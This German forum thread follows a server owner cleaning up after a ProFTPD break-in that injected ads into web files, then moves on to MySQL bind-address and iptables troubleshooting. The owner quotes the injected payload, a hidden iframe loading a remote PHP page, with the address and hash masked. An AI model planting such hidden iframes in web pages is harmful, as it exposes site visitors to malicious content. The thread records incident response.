Anzeigen der zuletzte geänderten Datein

[NacKteOmA]

Leider ist heute Mittag jemanden gelungen auf meinen Proftpd Server einzubrechen. Hier wurden einige .html / .php Datein mit einen Werbebanner versehen. Da ich dem ganzen nicht ganz traue würde ich gerne mir alle sämtlichen Datein die zu letzte geändert wurden auflisten lassen. Am besten in einer Datei, da der Ordner einfach massig viele files beherbergt, ist es schwer alles manuel rauszusuchen.

Kennt ihr hierfür einen guten Befehl, wie ich dies sortieren und den output in einer file schreiben lassen kann?

 

[mr_brain]

Wie wäre es mit "find". Gibt da verschiedene Parameter +mtime, +ctime, +atime.

 

[NacKteOmA]

Danke das reicht auch schon =)

 

[d4f]

Beachte dass die Timestamps nicht geschuetzt sind und somit sehr wohl gefaelscht sein koennen.
Am besten alle Dateien die seit dem letzten Backup modifiziert wurden (durch Vergleich des Dateninhalts feststellen!) manuell kontrollieren und ggf. ueberschreiben.

 

[Perry_Rhodan]

Wie immer,

es besteht die Möglichkeit, das der Einbrecher mehr verändert hat, wie ein (nicht so versierter) Benutzer durch "find..." finden kann.

Nur wenn man sich sicher ist, alle Veränderungen gefunden zu haben und das Einfallstor geschlossen zu haben, sollte der Server so wie er ist online bleiben.

Wenn man sich nicht sicher ist, Server neu aufsetzen und Backup einspielen!

 

[NacKteOmA]

Danke soweit für eure Hilfe.

Leider waren es zu viele Datein die Manipuliert wurden und beim Updaten zickt proftpd rum (hat er leider schon vor ein paar tagen, daher scheint der proftpd eh die sicherheitslücke zu sein). Deswegen mach ich das System platt und spiel das Backup vom Vortag ein und nach manuellen check werden die aktuellen DBs auch zurück gespielt.

Das System ist auch seit gestern abend abgeschaltet (dienste abgeschaltet) und ziehe soweit nur noch die backups via Shell

Im übrigen wurde folgender Code eingeschleust

<iframe src="http://IP.IP.IP.IP/stats/priemIframe.php?hashftp=xxxxxxxxxxxxxxx..." width=10 border=1 height=10 style="visibility:hidden"></iframe>

Ich hoffe die haben darüber nicht alt zu viel "******e" eingeschleust.

 

[Joe User]

Nur wenn man sich sicher ist, alle Veränderungen gefunden zu haben und das Einfallstor geschlossen zu haben, sollte der Server so wie er ist online bleiben.

Auch dann muss die Kiste neu aufgesetzt werden, denn man kann sich nie sicher sein, alle Manipulationen entdeckt und beseitigt zu haben.

 

[NacKteOmA]

Kleine Frage nebenbei, mit welcher Syntax kann ich in der my.cnf (mysql) mehrere IP Adressen eintragen?

bind-adresse 127.0.0.1, 66.150.150.150

oder

bind-adresse 127.0.0.1 66.150.150.150

Oder geht dies überhaupt?

 

[wstuermer]

Laut Doku gibt's nur "--bind-address=IP" - also nur eine.

In deinem Beispiel würde ich die 66.150.150.150 binden, da lokal ja direkt über den Socket gegangen werden kann.
Ansonsten bliebe noch gar nicht zu binden und dann via iptables zu beschränken.

 

[NacKteOmA]

Ja scheinbar ist es dann nur via Iptables blockbar. Hab soweit alles durchprobiert und starten mochte MySQL dann oft nicht mehr.

Naja - jetzt ist mir natürlich nen kleiner Fehler bei den Iptables gelaufen. Ich hab beim dropen den Port vergessen. Jetzt werden alle Packete an allen Ports geblockt. Bitte nicht schlagen

Hab mal im Rescue die "bin" File von den Iptables verschoben damit er beim nächsten boot nicht Iptables laden kann.

So nun bin ich auf der Suche nach der DB / File wo Iptables seine regeln reingeschreibt. Irgendwie finde ich die nicht, wo kann ich dieses ändern?

 

[d4f]

Immer zuerst die Iptables-Regeln direkt ausprobieren, erst danach an einen "@reboot" Cron oder in init.d legen da die Regelliste bei einem Reboot geloescht wird und somit wieder bei solchen Fehler der Zugriff funktioniert

So nun bin ich auf der Suche nach der DB / File wo Iptables seine regeln reingeschreibt. Irgendwie finde ich die nicht, wo kann ich dieses ändern?

Iptables speichert nichts. Wenn du nicht explizit mit iptables-save und iptables-restore arbeitest ist beim naechsten Reboot die Regelliste leer.

 

[NacKteOmA]

habs soweit gefixt, einfach deinstalliert und wieder installiert mit apt-get. es läuft übrigens mit mit iptables-save und restore. so nen bisschen quick and dirty. sonst nutzt nur im grunde nur fail2ban die iptables.